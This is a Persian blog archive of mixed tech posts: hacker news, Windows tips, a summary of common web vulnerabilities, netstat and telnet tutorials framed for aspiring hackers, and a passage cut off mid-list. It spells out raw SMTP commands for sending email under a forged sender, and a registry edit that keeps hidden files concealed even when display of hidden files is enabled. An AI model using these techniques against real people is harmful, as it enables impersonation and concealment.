۱۱.۱۲.۱۳۸۷

مجازات بزرگ ترين هكر جهان در آمريكا

خبرگزاري فارس: بزرگ ترين هكر جهان كه سيستم ها و برنامه هاي رايانه ي پنتاگون و ناسا را هك كرده و آن ها را با مشكلات جدي مواجه كرده بود در آمريكا مجازات مي شود.

به گزارش خبرگزاري فارس به نقل از روزنامه گاردين، اين دادگاه حقوق بشر لندن تقاضاي دادرسي اين هكر انگليسي را رد كرده است و دادگاه هاي انگليس نمي توانند اين هكر را مجازات كنند.
مك كينوي 44 ساله كه سيستم هاي در عامل پنتاگون و ناسا نفوذ كرده و برنامه هاي آن ها را هك كرده بود بايد در يكي از دادگاه هاي آمريكا مجازات شود.
وكيل اين هكر انگليسي اعلام كرده است كه مذاكرات لازم را با مسئولان قضايي براي ماندن پرونده مك كينو در انگليس انجام داده است.
اين هكر كه به بزرگ ترين هكر جهان مشهور شده است اتهام نفوذ به 53 رايانه ارتش، 23 رايانه نيروي دريايي و 16 رايانه ناسا و وارد كردن 700 هزار دلار خسارت به اين سازمان ها را پذيرفته است.

۱۱.۱۱.۱۳۸۷

No upgrades from XP to Windows 7?

I know a lot of people who are skipping Vista but considering Windows 7, on the theory that it will be a greatly improved product, sort of a Vista R2.

If that’s your strategy, you probably need to be aware that, at least in the current not-a-beta release, upgrades from XP to Win7 are blocked. (I don’t know whether this restriction will be in the final edition as well, but I bet it is.) You can do a clean install only, with all your old Windows files going to a Windows.old directory and none of your files and settings transferred (you can, however, use Windows Easy Transfer to save settings first and restore them later).

So the compatibility issues you’re ignoring right now aren’t going to go away. If you have apps or hardware drivers that only work on XP and aren’t compatible with Vista, you’re going to have those same issues with Windows 7, which isn’t going to magically fix anything.

source::http://feeds.feedburner.com/~r/EdBott-WindowsandOfficeExpertise/~3/460051158/

http://pc-aras.com/en/?p=52

۱۱.۱۰.۱۳۸۷

Check your UPS battery

My office is equipped with three uninterruptible power supplies. Each one can run its equipment load for 5-10 minutes in the event of a power failure. These little gizmos really come in handy when very brief power outages (just a few seconds, typically) occur. If the UPS is doing its job, you barely even notice, and you don’t have to restart any hardware or software.
Except when the battery backup itself doesn’t work. See, those UPS units run on batteries, which eventually fail and need to be replaced. It is much better to replace the battery before it goes dead than it is to discover that your UPS can’t perform its intended function.
Long story short, one of these batteries failed recently, and so to honor the occasion I’m going to replace the batteries in all three units. (They’re all roughly the same age, so if one fails, the others are likely to be close behind.)
These are Belkin F6C1000-TW-RK units. Although they list for $159, you can usually pick them up for under $120 (an Amazon.com partner has this model right now for $101.04). They’ve been very reliable through the years, and Belkin’s quality and support are excellent.
So who else has a UPS? Has it ever saved your bacon, or has it failed when you needed it?

Upload to Facebook and YouTube from Windows Live Photo Gallery (Beta)

Author: admin // Category: Internet
I just discovered these gems on Channel 10 - upload plug-ins for Facebook and YouTube coming to Windows Live Photo Gallery. I’ve often wondered where the rest of the upload wizards are. Now, can we just get one plug-in that handles upload to multiple services at the same time?
Download LiveUpload for Facebook (Beta)
Download LiveUpload for YouTube (Beta)
source::source
Tags: , , ,

۱۱.۰۷.۱۳۸۷

ده دلیل اصلی هک شدن سایت ها

هکرها معمولا از نواقص و عدم رعایت نکات امنیتی توسط طراحان سایتها و برنامه نویسان جهت نفوذ به سایتها استفاده میکنند مواردی که با کمی دقت قابل پیش بینی و رفع هستند. در ادامه به برخی از مهمترین نواقص و موارد رایج در هک سایتها در سالهای اخیر اشاره شده است.

1. Cross site scripting یا XSS
این مشکل زمانی ایجاد می شود که اطلاعات ارسالی بین کاربران و سایت بدون بررسی و اعتبار سنجی لازم توسط نرم افزار سایت صورت گیرد. در این حالت هکرها میتوانند اسکریپتهایی را همراه اطلاعات به نرم افزار سایت تزریق کنند و این اسکریپتها هنگام نمایش اطلاعات در مرورگر دیگر کاربران سایت اجرا شده و مشکلاتی همچون سرقت اطلاعات نشست (Session) و دسترسی به اختیارات و اطلاعات دیگر کاربران و یا تغییر در صفحات سایت را ایجاد کند.

2.Injection flaws
در این شیوه هکر به همراه بخشی از اطلاعات یا پارامترهای ارسالی به سایت دستورات غیر مجازی که امکان خواندن،تغییر یا حذف یا درج اطلاعات جدید را فراهم میکند نیز تزریق میکند.یکی از معمول ترین این روشها SQL Injection است که امکان تغییر در اطلاعات و جداول بانک اطلاعاتی یا تغییر در درخواستها از بانک اطلاعات (مانند تعیین اعتبار کاربر و کلمه) را امکان پذیر میکند.

3.Malicious file execution
این مسئله به هکر ها اجازه اجرای برنامه یا کدی را میدهد که امکاناتی در تغییرات یا مشاهده اطلاعات یا حتی تحت کنترل گرفتن کل نرم افزار سایت یا سیستم را میدهد. این مشکل در سایتهایی که امکان ارسال فایل را به کاربران بدون بررسی ماهیت اطلاعات را می دهد اتفاق می افتد (مثلا ارسال یک اسکریپ PHP یا ASP به جای فایل تصویری توسط کاربر)

4.Insecure direct object reference
این مشکل عموما در دستکاری پارامترهای ارسالی به صفحات یا اطلاعات فرمهایی هست که بصورت مستقیم به فایل، جداول اطلاعاتی،فهرستها یا اطلاعات کلیدی اتفاق می افتد و امکان دسترسی یا تغییر فایلهای اطلاعاتی دیگر کاربران را ایجاد میکند. (مانند ارسال کد کاربر یا نام فایل مخصوص او بصورت پارامتر در آدرس صفحه که با تغییر آن امکان دسترسی یا تغییر در اطلاعات کاربر دیگری وجود خواهد داشت)

5.Cross site request forgery
در اینگونه حملات هکر کنترل مرورگر قربانی را یدست آورده و زمانی که وی وارد سایت (login) شده درخواستهای نادرستی را به سایت ارسال می کند. (نمونه آن چندی پیش دز سایت myspace اتفاق افتاده بود و هکری با استفاده از یک کرم اینترنتی پیغامی را در میلیونها صفحه کاربران این سایت نمایش داد)

6.Information leakage and improper error handling
همانطور که از نام این مشکل مشخص است زمانی که در خطاهای نرم افزار سایت به شکل مناسبی مدیریت نشوند در صفحات خطا اطلاعات مهمی نمایش داده شود که امکان سوء استفاده از آنها وجود داشته باشد.(نمونه ای از همین مشکل چندی پیش برای یکی از سایتهای فارسی نیز بوجود آمد و اطلاعات کاربری و کلمه عبور اتصال به بانک اطلاعات در زمان خطا نمایش داده می شد و باعث سوء استفاده و تغییر اطلاعات کاربران این سایت شد )

7.Broken authentication and session management
این مشکل در زمانی که نشست کاربر (Session) و کوکی اطلاعات مربوط به ورود کاربر به دلایلی به سرقت می رود یا به دلیلی نیمه کاره رها می شود ایجاد می شود. یکی از شیوه های جلوگیری از این مشکل رمز نگاری اطلاعات و استفاده SSL است.

8.Insecure cryptographic storage
این مشکل نیز چنانچه از عنوان آن مشخص است بدلیل اشتباه در رمزنگاری اطلاعات مهم (استفاده از کلید رمز ساده یا عدم رمز نگاری اطلاعات کلیدی) است.

9.Insecure communications
ارتباط ناامن نیز مانند مشکل قبلی است با این تفاوت که در لایه ارتباطات شبکه است.هکر در شرایطی میتواند اطلاعات در حال انتقال در شبکه را مشاهده کند و از این طریق به اطلاعات مهم نیز دست پیدا کند. همانند مشکل قبلی نیز استفاده از شیوه های رمزنگاری و SSL راه حل این مشکل است.

10.Failure to restrict URL access
برخی از صفحات سایتها (مانند صفحات بخش مدیریت سایت) می بایست تنها در اختیار کاربرانی با دسترسی خاص باشند.اگر دسترسی به این صفحات و پارارمترهای ارسالی آنها به شکل مناسبی حفاظت نشده باشد ممکن است هکرها آدرس این صفحات را حدس بزنند و به نحوی به آنها دسترسی پیدا کنند.

فایلهایتان را همواره مخفی نگاه دارید

فایلهایتان را همواره مخفی نگاه دارید اکثر کاربران ویندوز XP با قابلیت Hidden کردن یا مخفی کردن فایلها از طریق قسمت Folder Option آگاهی دارند. هنگامی که شما فایل یا فولدری را Hidden میکنید کافی است که از طریق View > Folder Option قابلیت دیدن فایلهای Hidden را فعال کنید تا این فایلهای مخفی شده به سادگی مجدد رویت شوند. اما در این ترفند قصد داریم روشی بسیار کارآمد را به شما معرفی کنیم که همواره فایلهایی که Hidden کرده اید را Hidden نگه میدارد! به طوریکه حتی با فعال کردن گزینه Show hidden files and folders هم فایلها همچنان مخفی باقی خواهند ماند.


بدین منظور:
از منوی Start وارد Run شده و عبارت regedit را تایپ نموده و Enter بزنید تا ویرایشگر رجیستری باز شود.
حالا به آدرس زیر بروید:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/Current Version/Explorer/Advanced/Folder/Hidden/SHOWALL
اکنون از قسمت دیگر صفحه روی CheckedValue دوبار کلیک کنید. در پنجره باز شده Value را از 1 به 0 تغییر دهید.
حالا OK کرده و خارج شوید.

اکنون اگر در My Computer از منوی View وارد Folder Options شوید و سپس به تب View بروید ، در قسمت Hidden files and folders ، تیک گزینه Show hidden files and folders را بزنید و خارج شوید در صورت بازگشت مجدد خواهید دید که این گزینه لغو خواهد شد و همواره فایلهای شما به حالت Hidden باقی خواهند ماند.

شنايي با Netstat - آشنايي با TelNet - مفاهيم پروتکل TCP/IP در شبكه

آشنايي با Netstat

اين دستور که با سويچ هاي ديگري هم استفاده ميشه يکي از دستورايي هست که همه هکر ها اول باهاش آشنا ميشن.که با تايپ اين دستور شما متوجه آي پي سيستمها و پورتهايي که با آنها در ارتباط هستيد ميشويد و مشاهده ميکنيد که چه پورتهايي Listening و يا Established هستن اين باعث ميشود اگر پورتي مخصوص يک تروجن مثل 27374 که پورت اصلي Sub7 هست در سيستم شما باز بود شما متوجه اين پورت باز بروي سيستمتان بشويد. اگر در قسمت Foreign Address هم يک آي پي بوسيله پورتي به سيستم شما وصل بود شما به سرعت متوجه مي شويد که يک نفر با آن آيپي در سيستم شماست ، پس اين راهيست که متوجه گرديد سيستمتان آسيب پذير است يا نه ، براي مثال من با تايپ دستور Netstat در Ms-Dos پس از اتصال به اينتر نت نتايج زير را گرفتم : C:\WINDOWS>netstat Active Connections Proto Local Address Foreign Address State TCP Midia:1454 cs33.msg.sc5.yahoo.com:5050 ESTABLISHED TCP Midia:1488 63.123.44.222:80 ESTABLISHED TCP Midia:1491 opi1.vip.sc5.yahoo.com:80 TIME_WAIُT TCP Midia:1497 64.187.54.23:80 ESTABLISHED TCP Midia:1498 64.187.54.23:80 ESTABLISHED همانطور که ملاحظه ميکنيد اين دستور گاهي اوقات اسم صاحب سيستم کلاينتي که شما با آن در ارتباط هستيد را نيز ميدهد و چون اينجا من با کسي در PM نبودم اسم کسي را نميبينيد ولي اگر کسي با من چت کند و دستور Netstat را اجرا كند اسم را ميبيند و متوجه ميشود کهMidia صاحب آن سيستم کلاينتي مي باشدکه در حال چت كردن با آن است و همچنين در اين قسمت مشخص است که من با پورت 5050 با ياهو مسنجر ارتباط برقرار کرده ام و نيز نتايجي که در زير Local Address مشخص است اطلاعاتي درباره خود من مي باشد . و نتايجي که در Foreign Address بدست مياد مشخص ميکند که ما با چه سرور يا کلاينتي در ارتباط هستيم . که در سطر پنجم مثال بالا يعني 63.123.44.222:80 آيپي سايت ياهو ميباشد و مشخص ميكند كه من در سايت ياهو بوده و به وسيله پورت 80 که پورت Http ميباشد با اين وب سرور ارتباط برقرار کرده ام و در قسمت Status هم مشخص ميشود که شما با چه پورتهايي Established هستيد يعني ارتباط برقرار کرده و وصل هستيد و چه پورتهايي Listening يا منتظر Request و در حال شنيدن مي باشيد ، بنابراين با دستور Netstat مي شود يک عمل مانيتورينگ از تمام آيپي ها - پورتها و ماشينهايي که شما با آنها در ارتباط هستيد گرفت . دستور Netstat/? : Help برنامه Netstat را معرفي ميکند و سويچ هاي که ازش ميتوان استفاده کرد و در مقابل هر سويچ در مورد کار آن توضيح مختصري ميدهد. دستور Netstat -n : با اين دستور ميتوان آيپي و پورت سيستمي که شما با آن در ارتباط هستيد را بدست آورد . براي مثال وقتي شما با يک نفر در ياهو مسنجر چت ميکنيد پورت ۵۰۵۰ روي سيستم open هست چون ياهو از پورت ۵۰۵۰ استفاده ميکند پس با تايپ netstat -n خواهيد داشت: Active Connections Proto Local Address Foreign Address State TCP 217.219.223.21:1425 216.136.175.226:5050 TIME_WAIT TCP 217.219.223.21:1431 64.242.248.15:80 ESTABLISHED TCP 217.219.223.21:1437 217.219.223.38:5101 ESTABLISHED همانطور که ملاحظه ميکنيد من در اين لحظه با آيپي 217.219.223.38 در حال چت کردن بودم که اشتراکش هم از رايان روش بوده (مثل خودم)و آي پي خود نيز پروتکلي که ما بوسيله آن با يک سيستم ارتباط برقرار کرديم Proto مشخص ميشود در قسمت Local Address من هم TCPارتباط برقرار شده است. دستور Netstat -na : با تايپ کردن اين دستور در MS-DOS Prompt تمام پورتهايي که داده ها و بسته ها را ميفرستند مشخص ميشود ، نشان " na " در تمام دستورات به معني نمايش همه پورتها و ليست کردن آدرسهاي شبکه و شماره فرمها در يک قالب عددي مي باشد ، براي مثال من با تايپ اين فرمان در MS-DOS اين نتايج را گرفتم : C:\WINDOWS>netstat -na Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:1954 0.0.0.0:0 LISTENING TCP 0.0.0.0:5101 0.0.0.0:0 LISTENING TCP 217.219.223.21:1954 207.46.106.21:1863 ESTABLISHED TCP 217.219.223.21:1971 216.136.225.36:5050 ESTABLISHED TCP 217.219.223.21:2031 63.121.106.74:80 TIME_WAIT TCP 127.0.0.1:1025 0.0.0.0:0 LISTENING *:* UDP 0.0.0.0:1958 *:* UDP 64.110.148.59:9 *:* UDP 64.110.148.59:137 *:* UDP 64.110.148.59:138 خب ميبينيد که پورتهاي باز روي سيستم من ليست شده است. مثل 1954-1971-2031 دستور Netstat -a : اين دستور نيز مثل دستور Netstat -an يا -na عمل ميکنه فقط فرقش در اينه که اين دستور پورتها را با معادل اسميشان نشان ميدهد ، براي مثال پورت 139 را با معادل اسميش يعني Netbios نشان ميدهد و همچنين مانند دستور Netstat اسم صاحب سيستم را پرينت ميكند .(اين دستور براي تست کردن نقطه ضعفها و پورتهاي باز در سيستم هاي خودمان بسيار مفيد ميباشد و اگر سيستم آلوده به تروجن بود ميشود از اين دستورها و کلاً برنامه Netstat اين موضوع را فهميد ، پس آنهايي که سوال ميکنند ما چگونه بفهميم سيستم خودمان آلوده به تروجن هست يا نه ، استفاده از اين دستور و کلاً دستورات Netstat ميتواند خيلي به آنها کمک کند ) دستور Netstat -p xxx : منظور از xxx يعني آن پروتکلي که شما در نظر داريد که ميتواند TCP و UDP باشد. دستور Netstat -e : اين دستور نيز يکي از دستورات Netstat است که آماري از ارتباطها و بسته ها و شماره هاي ارسال و ذخيره بسته ها و داده ها را نشان ميدهد .(اين دستور بيشتر براي ويندوزهاي 98 , me و همينطور مودمهايي که آمار بسته ها را نميدهند خوب و مفيد است چون در ويندوز 2000 – XP- قسمتي از اين آمار براحتي در اختيار User قرار ميگيرد ، و شما ميتونيد با استفاده از اين دستور ترافيک ISP و شبکه را ببينيد و همينطور برنامه هايي که در حال دانلود هستسد را چک کنيد و يا اگر بسته اي در ارسالش مشکلي پيش بياد ميتوانيد در قسمت Errors مشاهده کنيد ، ...) دستور Netstat -r : اين دستور توسط کاربران معمولي اينترنت زياد بکار گرفته نميشود چون درک بعضي از گزينه هاش براي کاربران عادي دشوار ، بحرحال اين دستور جزييات دقيقي مثل آدرس Gateway - Interface Metric -Netmask , ... درباره آدرس آي پي شما در شبکه ميدهد ، همچنين در ويندوزهاي8 9 - ME کار دستور Netstat -a را هم انجام ميدهد .





آشنايي با TelNet

Telnet در اصل پروتکلي است که براي login و استفاده از يک کامپيوتر ديگر به کار مي رود. روش اجراي Telnet در لينوکس يا انواع ديگر Unix و نيز ويندوز 2000 تا حد خيلي زيادي شبيه چيزي است که ما گفتيم. براي آشنايي بيشتر با telnet و گرفتن جواب دقيقتر سوالات بالا روي مـــن کليک کنيد که به يک ميزبان واقعي Telnet شما را متصل مي کند که مي توانيد به رايگان عضو شويد و از خدمات آن استفاده کنيد. خواهيد ديد که لينک فوق در حقيقت Hyper Terminal را باز مي کند. در حقيقت هم اگر به درون Hyper Terminal برويد مي توانيد در قسمت برقراري تماس با انتخاب TCP/IP مستقيما از آن به عنوان Telnet استفاده کنيد. اما اينکه Telnet در هک چه نقشي داره و چه فايده اي داره کلاً رو از زبان "کارولين مينل" برايتان مي نويسم: "فقط با يک سرويسگير Telnet [مثل همين Telnet خودمون در ويندوز] شما مي توانيد: · ايميل بفرستيد. · سورس (متن برنامه) سايتها را بخوانيد. · به ميزبانهاي وب وروديهاي غير منتظره بفرستيد که مي تواند سبب دريافت پاسخهاي شگفت انگيز و گاهي غير قانوني شود. · به بسياري از ديگر سرويسهاي کامپيوترهاي ميزبان وب ورودي دلخواه خود را بدهيد. · در سرويسهايي که ميزبانها، روترها و حتي کامپيوترهاي شخصي مردم در منزلشان در اختيار شما مي گذارند کاوش و جستجو کنيد." تلنت کردن معمولا اولين کاري است که يک هکر براي هک کردن يک سايت انجام ميدهد، زيرا بعضي از پورتها در صورت بسته نبودن روي آن سرور، معمولا حاوي اطلاعات بسيار مهمي هستند.(به همين دليل ما بايد اول پورتها رو چک کنيم بعد telnet چون اگر پورتي که ما بهش telnet ميکنيم close باشه دستور اجرا نميشه) موضوع مهمي كه يك نفوذ گر واقعي به آن توجه مي كند در سه اصل خلاصه شده است : ۱- او هيچگاه سعي در استفاده از برنامه هايي كه ديگران نوشته اند نمي كند ... »البته ممكن است تعدادي از هكر ها باشند كه با استفاده از تروجان ها يا Back doors ها به اين كار بيپردازند و فقط خود را با اين مباحث ساده درگير کنند. 2- معمولا از به كارگيري برنامه هاي گرافيكي كه حتي خود طراحي كرده اند نفرت دارند و فقط در دنياي سياه و سفيد msdos-prompt براي خود حكومت تشكيل ميدهند.(در اصل از استفاده نرم افزار براي هک نفرت دارند) 3- موضوع سوم و اساسي اين است كه فقط يك چيز را در دنيا ميشناسند و آن هم تايپ كردن است.تايپ در صفحه سياه و سفيد command prompt . در ويندوز XP، يکي از بهترين ابزارهايي که در دست شماست، همان صفحه مشکي Command prompt است. در ويندوز XP دو نوع DOS وجود دارد. يکي cmd.exe و ديگري command.com که cmd.exe براي کارهاي ما مناسبتر است و کليک روي دگمه Start و انتخاب All programs و انتخاب Accessories و سپس کليک روي Command prompt نيز همين را باز خواهد کرد. (راه مناسبتر: دگمه ويندوز کيبورد را به همراه حرف R فشار دهيد، تايپ کنيد cmd و Enter کيبورد را فشار دهيد). تايپ کردن Help و فشردن Enter ليستي از دستورات را براي شما به نمايش در مي آورد که متاسفانه دستورهاي مناسب براي هک را از قلم انداخته است. (ناگفته نماند که Help ويندوزXP اگر بدانيد که در کجاي آن به دنبال چه بگرديد نسبتاً کامل است). از جمله مهمترين اين دستورها مي توان به دستورات زير اشاره کرد: TCP/IP command: telnet, netstat, nslookup, tracert, ping, ftp NetBIOS commands: nbtstat, net use, net view, net localgroup (و چند دستور ديگر) در اين شماره، براي اينکه هم کمي با telnet (که به عنوان يکي از مهمترين ابزارهاي هک مطرح بوده و هست) آشنا شويد هم از موضوعي شروع کرده باشيم که ملموس و جذاب باشد، فرستادن ايميل از طرف هرکسي به هرکسي با telnet را آموزش مي دهيم (من هم مي دونم که راههاي آسونتري براي اين کار هست و راحتترين راهش استفاده از Outlook مايکروسافت است، اما مطمئنم از ديدن پشت صحنه نمايش فرستادن ايميل لذت خواهيد برد). قبل از هر چيز بگم که telnet کردن به خودي خود جرم نيست و استفاده از telnet براي فرستادن يا گرفتن ايميل نه ضرري براي شما دارد و نه ميزبان. اما شما اين حق را نداريد که از طرف کسي به کس ديگر ايميل بزنيد مگر با اجازه آنها.اول وارد صفحه سياه خط فرمان شويد (مراحل نوشته شده در بالا)، حالا مي خواهيم از دستور telnet استفاده کنيم: telnet target port به جاي target آدرس سايت يا کامپيوتر و به جاي port بايد آدرس پورت را وارد کنيد. در مثال اين شماره با فرستادن ايميل (smtp) سروکار داريم که پورت آن 25 است و آدرس نيز آدرس يک سرور ايميل بايد باشد. به عنوان مثال telnet mail.hamsafar.com 25 را خواهيم داشت. همسفر، وب سايت من که عضويت در آن را به شما توصيه مي کنم، فقط يک مثال است و شما مي توانيد از هر آدرس مشابهي استفاده کنيد. جوابي دريافت خواهيد کرد که معمولا شامل نام ميزبان ايميل است. حالا وقت سلام کردن با دستور helo است (دستور ehlo هم داريم که مي توانيد امتحانش کنيد). بهتر است جلوي helo آدرس ايميل فرستنده را درج نماييد. با گرفتن جواب سلام، براي فرستادن ايميل از دستور mail استفاده مي کنيم:mail from leyli@masalan-ye-sity.com بعد از گرفتن OK حالا گيرنده را معرفي مي کنيم: rcpt to: majnoon@hamsafar.com اين بار بعد از گرفتن OK دستور data را تايپ و Enter کنيد. توجه کنيد که ميزبان به شما مي گويد وقتي کارتان تمام شد . بزنيد که اين يعني زدن يک Enter، تايپ کردن يک نقطه و دوباره زدن Enter. حالا وقت وارد کردن Subject، to و from و سپس زدن دو Enter و وارد کردن متن ايميل و سپس زدن Enter، تايپ کردن نقطه و زدن Enter دوم است. در عکس بالا فقط Subject وارد شده است. نمونه کاملتري که شامل To و From مي باشد به صورت زير است: data 354 ok, send it; end with . From: Leyli@masalan-ye-sity.com To: Majnoon@hamsafar.com Subject: Salam! In email faghat be ghasde azmayesh ferestade shode ast. Rooze khooby dashte bashid . 250 Message queued به تفاوت اين دو مورد در عکس زير توجه کنيد: توجه کنيد که همسفر فقط به شما اجازه خواهد داد به آدرسهايي که به hamsafar.com ختم مي شوند ايميل بزنيد. اگر تمايل به خريد ايميل روي همسفر (webmail & pop3) را داريد، با ما به آدرس sales@hamsafar.com مکاتبه کنيد. اما دستوراتي که گفته شد روي هر ميزباني کار خواهد کرد. به احتمال زياد جايي که از آن اينترنت گرفته ايد اگر درخواست ايميل POP3 از آنها بکنيد به رايگان به شما خواهند داد و شما آدرسي که به عنوان SMTP يا Outgoing server از آنها دريافت مي کنيد را به جاي mail.hamsafar.com خواهيد نوشت. در هر صورت شما اين اجازه را داريد که با روش فوق با من به آدرس ehssanr@hamsafar.com مکاتبه کنيد و به اين شکل روش را آزمايش کنيد. به ياري خدا در شماره آينده با آموزش نحوه نصب و استفاده از ميزبان SMTP خود ويندوز XP، خواهيد آموخت که چگونه بي نياز از هر SMTP ايميل بفرستيد. حالا که به اينجا رسيديم اميدوارم اين سه سوال براي شما پيش آمده باشد که اگر جوابشان را هم مي دانستيد که هيچ وگرنه ما به آنها جواب مختصر و مفيد خواهيم داد. اگر هم هيچ سوالي برايتان پيش نيامده اين قسمت را باز هم به دقت بخوانيد چرا که مهمترين مفاهيم را به سادگي توضيح داده ايم. باز هم تاکيد مي کنم که اين سه سوال و پاسخ آنها را با دقت بخوانيد و بفهميد. چند نکته مهم : سوال : اسم Target که در قالب Telnet target port مطرح کرديم چيست و چرا برخي به جاي آن 4 تا عدد مي زنند؟ پاسخ: هر کامپيوتر روي اينترنت با 4 عدد بين 0 تا 255 که با نقطه از هم جدا مي شوند مشخص مي شود. در XP براي فهميدن IP خود کافي است که روي مانيتورهاي نشاندهنده اتصال شما به اينترنت دابل کليک کنيد و از بالاي پنجره ظاهر شده با انتخاب قسمت جزئيات (Details) آدرس IP خود را خواهيد ديد.(براي کساني که ويندوز قديمي دارند معمولا يک راه مناسب تايپ کردن winipcfg در پنجره Run و فشردن Enter است). حال وقتي که کسي يک Domain ثبت مي کند، در واقع روي اين عددها يک اسم مي گذارد. اين کار دو فايده اساسي دارد. يکي اينکه اگر عدد فرد به هر دليل عوض شود لازم نيست دوباره به همه خبر دهد و دليل ديگر آن اين است که اسم ساده تر به خاطر سپرده مي شود و احتمال اشتباه در آن کمتر است. همانطور که مي بينيد تشبيه IP به شماره تلفن تا حدي به فهم آن کمک خواهد کرد. در اينجا قصد نداريم وارد بحث دقيق IP بشويم اما دو عدد اول IP حتما به اينکه از کجا اينترنت داريد مربوط است و به طور تئوري با داشتن IP شما مي توان مکان شما را به صورت فيزيکي هم در روي کره زمين مشخص کرد. براي دانستن IP يک سايت کافي است که از داخل Command Prompt، دستور Ping را اجرا کنيد. به سادگي تايپ کنيد Ping yahoo.com يا Ping hamsafar.com تا IP را ببينيد. پس حالا ديديد که در واقع منظور از Target شماره آن کامپيوتري است که قصد داريد به آن متصل شويد. (مفهوم Port و کمي از پروتکل Telnet سوال : اصطلاح port که در قالب Telnet target port مطرح کرديم چيست و چرا ما آنرا برابر 25 گرفتيم؟ اگر جاي آن را خالي بگذاريم چه مي شود؟ ترجمه کلمه port به فارسي "بندر" مي شود. کامپيوتر مقصد را به صورت جزيره اي تصور کنيد که چندين بندر دارد و هرکدام تخصص خاص خود را دارند. يکي براي نفتکشهاست يکي براي صادرات سنگ معدن و... . Port روي کامپيوتر هم در حقيقت همچين مفهومي داره. Port کامپيوتر جايي است که اطلاعات مي توانند از آن خارج يا به آن وارد شوند. کيبورد، پرينتر، نمايشگر و مودم از پورتهايي هستند که به راحتي از آنها درک فيزيکي داريد اما پورتهاي مجازي توسط نرم افزار ايجاد مي شوند. وقتي پورت مودم شما به اينترنت متصل مي شود، کامپيوتر شما مي تواند هر کدام از پورتها را که تعدادشان بيش از 65000 عدد است ببندد يا باز بگذارد و نيز مي تواند به هر کدام از اين پورتهاي يک کامپيوتر ديگر متصل شود (البته در صورتي که آن کامپيوتر بر روي اين پورت چيزي در حال اجرا داشته باشد و نيز ديوارآتش (firewall) آن را نبسته باشد. (در ويندوز XP هنگامي که اينترنت خود را تنظيم مي کنيد اين امکان را به شما مي دهد که با استفاده از ديوار آتش جلوي نفوذ ديگران به شما را بگيرد که به طور پيش فرض خودش آنرا فعال مي کند). پورتهاي خاص کاربردهاي خاص دارند. پورت 25 معمولا براي SMTP (مخفف Simple mail transfer protocol ) است و ما براي ارسال ايميل از آن استفاده کرديم. اگر قصد دريافت ايميلهايمان را داشتيم به چورت 110 سر مي زديم، براي مشاهده صفحات وب به سراغ پورت 80 مي رويم و... (درست حدس زديد! Outlook هم به طور پيش فرض براي ارسال ايميل از پورت 25 و براي دريافت آن از پورت 110 استفاده مي کند و اينترنت اکسپلورر هم به پورت 80 شماره IP آدرس سايتي که مي نويسيد سر مي زند.) و در پايان اگر پورت را ننويسيد، پورت برابر 23 فرض مي شود که پورت Telnet است. به پاسخ سوال اول دوباره سر بزنيد. وقتي روي لينکي که داده ام کليک مي کنيد در حقيقت به پورت 23 آن ميزبان متصل مي شويد. امروزه بسياري از سايتها بخصوص سايتهايي که از ميزباني ويندوزي استفاده مي کنند سرويس Telnet ندارند و امکان اتصال به پورت 23 وجود ندارد اما من باز هم توصيه مي کنم که براي تجربه Shell Account هم که شده Telnet واقعي را تجربه کنيد. اين Telnet در حقيقت معمولا يک BBS هم هست اما امکانات بسيار زيادي هم براي يک هکر دارد. براي آشنايي اوليه صرف اينکه کمي انگليسي بفهميد و هرموقع گير کرديد تايپ کنيد Help و Enter کنيد بايد کافي باشد. سوال :آدرس مورد استفاده در Telnet براي سايتهاي مختلف را چگونه پيدا کنيم؟ پاسخ:اگرچه بسياري از سايتها از همان mail.domain-name.com استفاده مي کنند، اين امر همه گير نيست. در ويندوز و با استفاده از cmd.exe خودمان به راحتي مي توانيم اين آدرس را براي 99% دومينها تعيين کنيم. پس از اجراي cmd، دستور nslookup را با تايپ کردن اين کلمه و فشردن Enter اجرا کنيد. از آنجايي که ما قصد گرفتن اطلاعات در مورد سامانه دريافت ايميل آن سايت را داريم، از کد mx که مخفف mail exchanger است استفاده مي کنيم. به طور کلي اطلاعات يک domain شامل چند قسمت است که براي مورد ما فقط اين اطلاعات مورد نياز است. پس تايپ کنيد set q=mx و Enter را فشار دهيد. حال کافي است نام domain را تايپ و Enter کنيد. در برخي موارد مانند مثال زير فقط يک جواب مي گيريد: > irib.com Server: UnKnown Address: 213.165.123.1 irib.com MX preference = 60, mail exchanger = mail.irib.com mail.irib.com internet address = 62.220.119.60 و يا مثال زير: irna.com MX preference = 10, mail exchanger = irna.com irna.com nameserver = ns1.gpg.com irna.com nameserver = ns1.irna.net irna.com nameserver = ns1.simorgh.com irna.com nameserver = ns2.irna.net irna.com internet address = 209.1.163.101 ns1.irna.net internet address = 217.25.48.18 ns1.irna.net internet address = 194.126.61.8 ns2.irna.net internet address = 194.126.61.7 ns2.irna.net internet address = 217.25.48.17 که نشان مي دهد براي آدرس irib.com بايد از mail.irdir.com استفاده کرد و براي آدرس irna.com بايد از irna.com استفاده کرد. به قسمت قرمز رنگ دقت کنيد. هميشه پاسخ مورد نظر ما بعد از عبارت mail exchanger قرار مي گيرد. گاهي تعداد جوابها بيشتر است: hamsafar.com MX preference = 10, mail exchanger = mail.hamsafar.com hamsafar.com MX preference = 15, mail exchanger = hamsafar.com mail.hamsafar.com internet address = 38.118.143.98 hamsafar.com internet address = 38.118.143.98 و يا مثال زير: hotmail.com MX preference = 5, mail exchanger = mx4.hotmail.com hotmail.com MX preference = 5, mail exchanger = mx1.hotmail.com hotmail.com MX preference = 5, mail exchanger = mx2.hotmail.com hotmail.com MX preference = 5, mail exchanger = mx3.hotmail.com hotmail.com nameserver = ns1.hotmail.com hotmail.com nameserver = ns2.hotmail.com hotmail.com nameserver = ns3.hotmail.com hotmail.com nameserver = ns4.hotmail.com mx4.hotmail.com internet address = 65.54.254.151 mx4.hotmail.com internet address = 65.54.253.230 mx1.hotmail.com internet address = 65.54.254.129 mx1.hotmail.com internet address = 65.54.252.99 mx1.hotmail.com internet address = 65.54.166.99 mx2.hotmail.com internet address = 65.54.254.145 mx2.hotmail.com internet address = 65.54.252.230 mx2.hotmail.com internet address = 65.54.166.230 mx3.hotmail.com internet address = 65.54.254.140 mx3.hotmail.com internet address = 65.54.253.99 ns1.hotmail.com internet address = 216.200.206.140 ns2.hotmail.com internet address = 216.200.206.139 ns3.hotmail.com internet address = 209.185.130.68 ns4.hotmail.com internet address = 64.4.29.24 و يا مثال زير: cnn.com MX preference = 10, mail exchanger = atlmail4.turner.com cnn.com MX preference = 20, mail exchanger = atlmail2.turner.com cnn.com MX preference = 30, mail exchanger = 